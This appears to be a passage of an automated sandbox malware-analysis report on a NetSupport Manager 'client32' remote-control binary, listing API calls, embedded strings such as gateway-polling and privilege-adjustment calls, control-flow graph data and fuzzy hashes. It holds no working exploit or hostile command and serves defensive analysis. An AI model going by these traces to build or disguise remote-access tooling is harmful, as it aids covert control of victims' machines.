                                                                                                                                                                                                    • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$141700$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1276 689ba980-689ba9e7 call 689b5840 1279 689ba9ed-689ba9f0 1276->1279 1280 689baa9c 1276->1280 1279->1280 1282 689ba9f6-689ba9fb 1279->1282 1281 689baaa2-689baaae 1280->1281 1283 689baab0-689baac5 call 689d28e1 1281->1283 1284 689baac6-689baacd 1281->1284 1282->1280 1285 689baa01-689baa06 1282->1285 1288 689bab48-689bab58 socket 1284->1288 1289 689baacf-689baad7 1284->1289 1285->1280 1287 689baa0c-689baa21 EnterCriticalSection 1285->1287 1293 689baa89-689baa9a LeaveCriticalSection 1287->1293 1294 689baa23-689baa2b 1287->1294 1290 689bab5a-689bab6f WSAGetLastError call 689d28e1 1288->1290 1291 689bab70-689babc9 #21 * 2 call 689b5e90 1288->1291 1289->1288 1295 689baad9-689baadc 1289->1295 1305 689babcb-689babe3 #21 1291->1305 1306 689babe8-689bac1f bind 1291->1306 1293->1281 1298 689baa30-689baa39 1294->1298 1295->1288 1299 689baade-689bab05 call 689ba5c0 1295->1299 1302 689baa3b-689baa3f 1298->1302 1303 689baa49-689baa51 1298->1303 1313 689bab0b-689bab2f WSAGetLastError call 689b30a0 1299->1313 1314 689bad4a-689bad69 EnterCriticalSection 1299->1314 1302->1303 1307 689baa41-689baa47 1302->1307 1303->1298 1309 689baa53-689baa5e LeaveCriticalSection 1303->1309 1305->1306 1310 689bac41-689bac49 1306->1310 1311 689bac21-689bac40 WSAGetLastError closesocket call 689d28e1 1306->1311 1307->1303 1312 689baa60-689baa88 LeaveCriticalSection call 689d28e1 1307->1312 1309->1281 1316 689bac4b-689bac57 1310->1316 1317 689bac59-689bac64 1310->1317 1325 689bae82-689bae92 call 689d28e1 1313->1325 1328 689bab35-689bab47 call 689d28e1 1313->1328 1318 689bad6f-689bad7d 1314->1318 1319 689bae50-689bae80 LeaveCriticalSection GetTickCount InterlockedExchange 1314->1319 1324 689bac65-689bac83 htons WSASetBlockingHook call 689b7610 1316->1324 1317->1324 1326 689bad80-689bad86 
1318->1326 1319->1325 1334 689bac88-689bac8d 1324->1334 1331 689bad88-689bad90 1326->1331 1332 689bad97-689bae0f InitializeCriticalSection call 689b8fb0 call 689d0ef0 1326->1332 1331->1326 1336 689bad92 1331->1336 1349 689bae18-689bae4b getsockname 1332->1349 1350 689bae11 1332->1350 1339 689bac8f-689bacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 689b30a0 call 689d28e1 1334->1339 1340 689bacc6-689baccd 1334->1340 1336->1319 1343 689baccf-689bacd6 1340->1343 1344 689bad45 WSAUnhookBlockingHook 1340->1344 1343->1344 1348 689bacd8-689bacfb call 689ba5c0 1343->1348 1344->1314 1348->1344 1355 689bacfd-689bad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 689b30a0 1348->1355 1349->1319 1350->1349 1355->1325 1358 689bad32-689bad44 call 689d28e1 1355->1358
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689B5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,689B8F91,00000000,00000000,689FB8DA,?,00000080), ref: 689B5852
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,00000000,00000000), ref: 689BAA11
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA58
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA68
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA94
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 689BAB0B
                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB4E
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB5A
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB8E
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BABB1
                                                                                                                                                                                                    • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BABE3
                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC18
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC21
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC29
                                                                                                                                                                                                    • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC65
                                                                                                                                                                                                    • WSASetBlockingHook.WSOCK32(689B63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC76
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC8F
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC96
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC9C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BACFD
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD04
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD0A
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD45
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD4F
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-689FCB4A), ref: 689BADE6
                                                                                                                                                                                                      • Part of subcall function 689B8FB0: getsockname.WSOCK32(?,?,00000010,?,02ED2CB8,?), ref: 689B9005
                                                                                                                                                                                                    • getsockname.WSOCK32(00000000,?,?), ref: 689BAE4B
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAE60
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689BAE6C
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 689BAE7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 689BAD14
                                                                                                                                                                                                    • *TcpNoDelay, xrefs: 689BABB8
                                                                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 689BACA6
                                                                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 689BAB17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTickbindhtonsinet_ntoasocket
                                                                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B924C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B925B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B9274
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B92A8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B92B0
                                                                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 689B92BC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ReadSocket - Connection has been closed by peer, xrefs: 689B92E0
                                                                                                                                                                                                    • *RecvTimeout, xrefs: 689B927B
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 689B9226
                                                                                                                                                                                                    • ReadSocket - Error %d reading response, xrefs: 689B92F7
                                                                                                                                                                                                    • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 689B922B
                                                                                                                                                                                                    • ReadSocket - Would block, xrefs: 689B928A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountSleepTick$ErrorLast
                                                                                                                                                                                                    • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,9760354D,05C2A5B0,976034B3,FFFFFFFF,00000000), ref: 689C31E2
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,689EECB0), ref: 689C31EC
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,05C2A5B0,976034B3,FFFFFFFF,00000000), ref: 689C322A
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,689EECB0), ref: 689C3234
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,9760354D), ref: 689C32BE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 689C32D3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 689C334D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread
                                                                                                                                                                                                    • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(00000083,00000000,000000BC,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170625
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170677
                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 1117068A
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 111706F4
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170708
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                    • String ID: Norwegian-Nynorsk
                                                                                                                                                                                                    • API String ID: 3475089800-461349085
                                                                                                                                                                                                    • Opcode ID: 2e58f17488358e80f7fe220b91d02648b230705b5a53270d03aa08bb5cd5880e
                                                                                                                                                                                                    • Instruction ID: a40d110deca82e0359611976522471010d48599839117bc449c0d8eb289fe403
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e58f17488358e80f7fe220b91d02648b230705b5a53270d03aa08bb5cd5880e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A151D4B9A00317ABFB115F31CD84B65FBA8AF02748F118161ED449B3C0E7B0D890C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                                                    • API String ID: 3222248624-258972079
                                                                                                                                                                                                    • Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                                                                    • API String ID: 3192549508-611217420
                                                                                                                                                                                                    • Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,75C1F550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                    • EqualSid.ADVAPI32(?,005FF708,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
Similarity
• API ID: InformationToken$AllocateEqualInitialize
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109C77D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
Memory Dump Source
• Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
APIs
• GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170253
• GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170294
• GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170337
Memory Dump Source
• Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: InfoLocale
APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
• CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
Memory Dump Source
• Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
APIs
• EnumSystemLocalesA.KERNEL32(11170208,00000001,111705DD,00000001,00000000,00000000), ref: 111704E0
Memory Dump Source
• Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    • Opcode ID: 129d2d17a05abfcc03aa176b6a9e6cde425405e1b3fabe192a562070e6df28d4
                                                                                                                                                                                                    • Instruction ID: 2f4ca2e02cbe28bb9c19aec6a05583bc0426c1b03cc76bb2c162af69d9cf893f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 129d2d17a05abfcc03aa176b6a9e6cde425405e1b3fabe192a562070e6df28d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16F067395A0B068BE721CF39C64CB56FBE0EB06718F108E2DD5E7D2690D7B9E044CA40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEventMetricsSystem
                                                                                                                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$141700$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                                                                                                    • API String ID: 1866202007-3016537214
                                                                                                                                                                                                    • Opcode ID: cbcefc7ec60a5b39576baa76d759e841cb725e3a3be421aaceec234747df412c
                                                                                                                                                                                                    • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbcefc7ec60a5b39576baa76d759e841cb725e3a3be421aaceec234747df412c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$141700$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 2111968516-1865671485
                                                                                                                                                                                                    • Opcode ID: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
                                                                                                                                                                                                    • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,75C223A0), ref: 1113FC13
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                                                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                                                                    • API String ID: 1621119295-2061581830
                                                                                                                                                                                                    • Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
